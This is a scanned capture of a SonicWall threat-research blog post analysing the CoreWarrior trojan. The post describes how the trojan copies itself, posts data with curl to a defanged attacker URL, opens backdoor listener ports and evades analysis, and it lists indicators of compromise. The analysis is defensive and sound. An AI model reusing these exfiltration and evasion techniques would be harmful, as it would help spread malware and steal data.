urlscan.io logo urlscan.io
SecurityTrails logo

blog.sonicwall.com Open in urlscan Pro
107.154.76.50  Public Scan

Back to summary
Submitted URL: http://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
Effective URL: https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
Submission: On October 16 via api from DE — Scanned from DE

Form analysis 1 forms found in the DOM

GET https://blog.sonicwall.com/en-us/

<form action="https://blog.sonicwall.com/en-us/" id="searchform" method="get" class="">
  <div> <input type="submit" value="" id="searchsubmit" class="button avia-font-entypo-fontello"> <input type="text" id="s" name="s" value="" placeholder="Search"></div>
</form>

Text Content

 * Home
 * Topics
   * All Posts
   * Boundless Cybersecurity
   * BYOD and Mobile Security
   * Cloud Security
   * Education
   * Email Security
   * Government
   * Healthcare
   * Industry News and Events
   * Network Security
   * Partners
   * Retail
   * Small & Medium Businesses
   * SonicWall Community
   * Threat intelligence
   * Wireless Security
 * Authors
 * English
 * Search
 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * Menu

 * Facebook
 * Twitter
 * Linkedin
 * Instagram
 * Mail
 * Rss




COREWARRIOR SPREADER MALWARE SURGE




By Security News
October 11, 2024

OVERVIEW

This week, the SonicWall Capture Labs threat research team investigated a sample
of CoreWarrior malware. This is a persistent trojan that attempts to spread
rapidly by creating dozens of copies of itself and reaching out to multiple IP
addresses, opening multiple sockets for backdoor access, and hooking Windows UI
elements for monitoring.

INFECTION CYCLE

The malware is a UPX-packed executable that has been manually tampered with and
will not unpack using the standard UPX unpacker.





Figures 1 (top), 2(bottom): Initial detection, and failure due to checksum error

On runtime, the executable creates a copy of itself with a randomly generated
name. The copy will launch a command prompt and use curl to POST data to
“http://wecan.hasthe(dot)technology/upload”. With each subsequent POST that is
completed, the parent program will delete the existing copy and create a new
copy. During testing, one hundred and seventeen copies were created and deleted
in under ten minutes.



Figure 3: Malware is connecting to site and posting data

As messages are being sent, the program will then bind a listener on ports
49730-49777 and 50334-50679. A secondary IP address of 172.67.183.40 had a
single connection made, but no TCP/UDP traffic was sent.



Figure 4: Multi-part output of data sent

The parent process will obtain information on the system drives, as well as
create a hook for the command prompt window to monitor for changes. The malware
has several types of anti-analysis capabilities, including:

 * Anti-debug using rdtsc to check debug times; program will exit if times
   exceed threshold
 * Evasion using a randomized sleep timer that changes per number of connection
   attempts/successes/failures (Figure 4)
 * VM environment detection, as there are strings to check for HyperV containers



Figure 5: Variables used in sleep determinations

Other protocols referenced by the code include FTP, SMTP, and POP3 for data
exfiltration.

SONICWALL PROTECTIONS

To ensure SonicWall customers are prepared for any exploitation that may occur
due to this malware, the following signatures have been released:

 * CoreWarrior.A

IOCS

85A6E921E4D5107D13C1EB8647B130A1D54BA2B6409118BE7945FD71C6C8235F (packed)

8C97329CF7E48BB1464AC5132B6A02488B5F0358752B71E3135D9D0E4501B48D (unpacked)

 * 
 * 
 * 
 * 
 * 

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets
cross-vector threat information from the SonicWall Capture Threat network,
consisting of global devices and resources, including more than 1 million
security sensors in nearly 200 countries and territories. The research team
identifies, analyzes, and mitigates critical vulnerabilities and malware daily
through in-depth research, which drives protection for all SonicWall customers.
In addition to safeguarding networks globally, the research team supports the
larger threat intelligence community by releasing weekly deep technical analyses
of the most critical threats to small businesses, providing critical knowledge
that defenders need to protect their networks.
Categories: Threat intelligence
Tags: Security News

SHARE THIS ENTRY

 * Share on Facebook
 * Share on Twitter
 * Share on Google+
 * Share on Pinterest
 * Share on Linkedin
 * Share on Tumblr
 * Share on Vk
 * Share on Reddit
 * Share by Mail



https://d3ik27cqx8s5ub.cloudfront.net/blog/media/uploads/sec-news-header-3.png
500 1200 Security News
https://blog.sonicwall.com/wp-content/uploads/images/logo/SonicWall_Registered-Small.png
Security News2024-10-11 13:01:582024-10-11 13:02:45CoreWarrior Spreader Malware
Surge


RECOMMENDED CYBER SECURITY STORIES

Ranbyus Banking Trojan, Cousin of Zbot
Adobe Embedded JBIG2 Stream BO (Feb 27, 2009)
Understanding CVE-2024-38063: How SonicWall Prevents Exploitation
Ryzerlo ransomware poses as Pokemon game (August 19, 2016)
Egregor Ransomware
Squid Game themed Android malware hides SpyNote spyware
Github hosted Android ransomware being misused in the wild
PHP-FPM Vulnerability leads to Remote code execution
Connect with an Expert


SEARCH




FACEBOOK


Recent
Tags
Recent
 * HORUS Protector Part 2: The New Malware Distribution Se...October 14, 2024 -
   10:43 am
 * CoreWarrior Spreader Malware SurgeOctober 11, 2024 - 1:01 pm
 * Microsoft Security Bulletin Coverage for October 2024October 9, 2024 - 10:07
   am
 * Fortifying Closed Networks: SonicWall’s Approach to Secure...October 8, 2024
   - 8:30 am

Tags
802.11AC Advanced Threats Antivirus Awards Capture Cloud Platform Channel Cloud
App Security CRN Cyberattack Cyber Security Cybersecurity cyberthreats DDoS
Education Email Security Encrypted Attacks Encrypted Threats Endpoint Protection
endpoint security Firewall Industry Awards IoT Malware MSSP Network Security
news Next-Gen Firewalls next generation firewalls Phishing Ransomware Real-Time
Deep Memory Inspection (RTDMI) Resources Resources RSA Conference SecureFirst
Partner Program Secure Mobile Access Security Security News SMB SonicWall
Capture ATP SonicWall Capture Client SonicWall WiFi Cloud Manager Threat
Intelligence Threat Report zero-day


ABOUT SONICWALL

About Us
Leadership
Awards
News
Press Kit
Careers
Contact Us


PRODUCTS

Firewalls
Advanced Threat Protection
Remote Access
Email Security


SOLUTIONS

Advanced Threats
Risk Management
Industries
Managed Security
Use Cases
Partner Enabled Services


CUSTOMERS

How To Buy
MySonicWall.com
Loyalty & Trade-In Programs


SUPPORT

Knowledge Base
Video Tutorials
Technical Documentation
Partner Enabled Services
Support Services
CSSA and CSSP Certification Training
Contact Support
Community

© Copyright 2023 SonicWall. All Rights Reserved.
 * Facebook
 * Twitter
 * Linkedin
 * Instagram
 * Mail
 * Rss

Microsoft Security Bulletin Coverage for October 2024 HORUS Protector Part 2:
The New Malware Distribution Service




PIN IT ON PINTEREST


Scroll to top